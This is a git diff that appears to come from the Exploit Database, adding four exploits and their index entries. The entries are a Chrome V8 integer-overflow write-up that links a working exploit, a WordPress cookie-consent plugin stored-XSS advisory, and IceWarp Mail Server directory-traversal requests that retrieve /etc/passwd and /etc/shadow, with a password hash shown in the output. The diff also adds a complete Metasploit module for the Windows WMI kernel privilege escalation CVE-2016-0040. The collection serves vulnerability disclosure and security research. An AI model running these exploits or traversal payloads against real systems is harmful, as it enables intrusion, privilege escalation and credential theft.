diff --git a/exploits/multiple/remote/44584.txt b/exploits/multiple/remote/44584.txt new file mode 100644 index 000000000..080498b44 --- /dev/null +++ b/exploits/multiple/remote/44584.txt @@ -0,0 +1,74 @@ +There's an integer overflow in computing the required allocation size when instantiating a new javascript object. + +See the following code in objects.cc + +// static +bool JSFunction::CalculateInstanceSizeForDerivedClass( + Handle function, InstanceType instance_type, + int requested_embedder_fields, int* instance_size, + int* in_object_properties) { + Isolate* isolate = function->GetIsolate(); + int expected_nof_properties = 0; + bool result = true; + for (PrototypeIterator iter(isolate, function, kStartAtReceiver); + !iter.IsAtEnd(); iter.Advance()) { + Handle current = + PrototypeIterator::GetCurrent(iter); + if (!current->IsJSFunction()) break; + Handle func(Handle::cast(current)); + // The super constructor should be compiled for the number of expected + // properties to be available. + Handle shared(func->shared()); + if (shared->is_compiled() || + Compiler::Compile(func, Compiler::CLEAR_EXCEPTION)) { + DCHECK(shared->is_compiled()); + expected_nof_properties += shared->expected_nof_properties(); // <--- overflow here! + } else if (!shared->is_compiled()) { + // In case there was a compilation error for the constructor we will + // throw an error during instantiation. Hence we directly return 0; + result = false; + break; + } + if (!IsDerivedConstructor(shared->kind())) { + break; + } + } + CalculateInstanceSizeHelper(instance_type, true, requested_embedder_fields, + expected_nof_properties, instance_size, + in_object_properties); + return result; +} + +By supplying a long prototype chain of objects with a large expected_nof_properties we can control the resulting value of instance_size by causing (requested_embedder_fields + requested_in_object_properties) << kPointerSizeLog2 to be overflown to a small negative value, resulting in an allocation smaller than header_size, which is the minimum required size for the base object class being allocated. This results in memory corruption when the object is initialised/used. + +void JSFunction::CalculateInstanceSizeHelper(InstanceType instance_type, + bool has_prototype_slot, + int requested_embedder_fields, + int requested_in_object_properties, + int* instance_size, + int* in_object_properties) { + int header_size = JSObject::GetHeaderSize(instance_type, has_prototype_slot); + DCHECK_LE(requested_embedder_fields, + (JSObject::kMaxInstanceSize - header_size) >> kPointerSizeLog2); + *instance_size = + Min(header_size + + ((requested_embedder_fields + requested_in_object_properties) + << kPointerSizeLog2), + JSObject::kMaxInstanceSize); + *in_object_properties = ((*instance_size - header_size) >> kPointerSizeLog2) - + requested_embedder_fields; +} + +The attached PoC crashes current stable on linux. + +See crash report ID: 307546648ba8a84a + +Chrome issue is https://bugs.chromium.org/p/chromium/issues/detail?id=808192 + +Attaching the working exploit for this issue. + +Note that issue_808192.html is a template - it requires server.py to do a version check and patch a few version dependent constants in, since some object layouts have changed during the range of Chrome versions on which the exploit was tested. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44584.zip \ No newline at end of file diff --git a/exploits/php/webapps/44585.txt b/exploits/php/webapps/44585.txt new file mode 100644 index 000000000..f6ef54a19 --- /dev/null +++ b/exploits/php/webapps/44585.txt @@ -0,0 +1,47 @@ +# Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting +# Date: 23/04/2018 +# Exploit Author: B0UG +# Vendor Homepage: http://www.wunderfarm.com/ +# Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/ +# Version: Tested on version 1.1.3 (older versions may also be affected) +# Tested on: WordPress +# Category : Webapps +# CVE: CVE-2018-10371 + +I. VULNERABILITY +------------------------- +Authenticated Persistent Cross-Site Scripting + +II. BACKGROUND +------------------------- +WF Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website. + +III. DESCRIPTION +------------------------- +A authenticated persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser. + +IV. PROOF OF CONCEPT +------------------------- +1) Access WordPress control panel. +2) Navigate to the 'Pages'. +3) Add a new page and insert the script you wish to inject into the page title. +4) Now navigate to 'Settings' and select 'WF Cookie Consent'. +5) Your injected script will now be executed. + +V. IMPACT +------------------------- +An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others. + +VI. SYSTEMS AFFECTED +------------------------- +WordPress websites running "WF Cookie Consent" plugin version 1.1.3 (older versions may also be affected). + +VII. REMEDIATION +------------------------- +Implement a web application such as Wordfence or uninstall the plugin. + +VIII. DISCLOSURE TIMELINE +------------------------- +April 23, 2018 1: Vulnerability identified. +April 23, 2018 2: Informed developer of the vulnerability. +May 2, 2018 3: No reply from the developer. \ No newline at end of file diff --git a/exploits/php/webapps/44587.txt b/exploits/php/webapps/44587.txt new file mode 100644 index 000000000..3bacf8633 --- /dev/null +++ b/exploits/php/webapps/44587.txt @@ -0,0 +1,119 @@ +Vendor: IceWarp (http://www.icewarp.com) +Product: IceWarp Mail Server +Version affected: 11.1.1 and below + +Product description: +IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. +IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux. + +Finding 1: Multiple Unauthenticated Directory traversal +Credit: Piotr Karolak of Trustwave's SpiderLabs +CVE: CVE-2015-1503 +CWE: CWE-22 + +#Proof of Concept + +The unauthenticated Directory Traversal vulnerability can be exploited by +issuing a specially crafted HTTP GET request to the +/webmail/client/skins/default/css/css.php. Directory Traversal is a +vulnerability which allows attackers to access restricted directories and +execute commands outside of the web server's root directory. + +This vulnerability affects /-.._._.--.._1416610368(variable, depending on +the installation, need to check page +source)/webmail/client/skins/default/css/css.php. + +Attack details +URL GET input file was set to ../../../../../../../../../../etc/passwd + +Proof-of-Concept: + +The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running: + +REQUEST +======= +GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1 +Referer: http://a.b.c.d/ +Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en +Host: a.b.c.d +Connection: Keep-alive +Accept-Encoding: gzip,deflate +Accept: */* + + +RESPONSE: +========= +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin + +....TRUNCATED + +test:x:1000:1000:test,,,:/home/test:/bin/bash +smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false + +The above proof-of-concept would retrieve the /etc/passwd file (the +response in this example has been truncated). + +#Proof of Concept + +The unauthenticated Directory Traversal vulnerability can be exploited by +issuing a specially crafted HTTP GET and POST request payload +..././..././..././..././..././..././..././..././..././..././etc/shadow +submitted in the script and/or style parameter. Directory Traversal is a +vulnerability which allows attackers to access restricted directories and +execute commands outside of the web server's root directory. + +The script and style parameters are vulnerable to path traversal attacks, +enabling read access to arbitrary files on the server. + +REQUEST 1 +========= + +GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1 +Host: a.b.c.d +Accept: */* +Accept-Language: en +Connection: close +Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main +Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en + +REQUEST 2 +========= + +GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1 +Host: a.b.c.d +Accept: */* +Accept-Language: en +Connection: close +Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en + +RESPONSE +======== +HTTP/1.1 200 OK +Connection: close +Server: IceWarp/11.1.1.0 +Date: Thu, 03 Jan 2015 06:44:23 GMT +Content-type: text/javascript; charset=utf-8 + +root:!:16436:0:99999:7::: +daemon:*:16273:0:99999:7::: +bin:*:16273:0:99999:7::: +sys:*:16273:0:99999:7::: +sync:*:16273:0:99999:7::: +games:*:16273:0:99999:7::: +man:*:16273:0:99999:7::: +lp:*:16273:0:99999:7::: + +....TRUNCATED + +lightdm:*:16273:0:99999:7::: +colord:*:16273:0:99999:7::: +hplip:*:16273:0:99999:7::: +pulse:*:16273:0:99999:7::: +test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: +smmta:*:16436:0:99999:7::: +smmsp:*:16436:0:99999:7::: +mysql:!:16436:0:99999:7::: \ No newline at end of file diff --git a/exploits/windows_x86-64/local/44586.rb b/exploits/windows_x86-64/local/44586.rb new file mode 100755 index 000000000..d5bc962e4 --- /dev/null +++ b/exploits/windows_x86-64/local/44586.rb @@ -0,0 +1,113 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/post/windows/reflective_dll_injection' +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows WMI Recieve Notification Exploit', + 'Description' => %q( + This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. + This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'smmrootkit', # crash code + 'de7ec7ed', # exploit code + 'de7ec7ed', # msf module + ], + 'Arch' => [ARCH_X64], + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread' + }, + 'Targets' => [ + ['Windows 7 SP0/SP1', { 'Arch' => ARCH_X64 }] + ], + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['CVE', '2016-0040'], + ['MSB', 'MS16-014'], + ['URL', 'https://github.com/de7ec7ed/CVE-2016-0040'], + ['URL', 'https://github.com/Rootkitsmm/cve-2016-0040'], + ['URL', 'https://technet.microsoft.com/en-us/library/security/ms16-014.aspx'] + ], + 'DisclosureDate' => 'Dec 4 2015', + 'DefaultTarget' => 0) + ) + end + + def check + # Windows 7 SP0/SP1 (64-bit) + + if sysinfo['OS'] !~ /windows/i + return Exploit::CheckCode::Unknown + end + + file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe' + major, minor, build, revision, branch = file_version(file_path) + vprint_status("ntoskrnl.exe file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") + + return Exploit::CheckCode::Safe if build > 7601 + + return Exploit::CheckCode::Appears + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + check_result = check + if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + end + + print_status('Launching notepad to host the exploit...') + notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + # Reader Sandbox won't allow to create a new process: + # stdapi_sys_process_execute: Operation failed: Access is denied. + print_status('Operation failed. Trying to elevate the current process...') + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0040', 'CVE-2016-0040.x64.dll') + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status('Payload injected. Executing exploit...') + process.thread.create(exploit_mem + offset, payload_mem) + + print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fd47333cf..589697960 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9700,6 +9700,7 @@ id,file,description,date,author,type,platform,port 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows, 44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows, 44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows, +44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16468,6 +16469,7 @@ id,file,description,date,author,type,platform,port 44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware, 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware, 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows, +44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39276,3 +39278,5 @@ id,file,description,date,author,type,platform,port 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware, 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple, +44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php, +44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,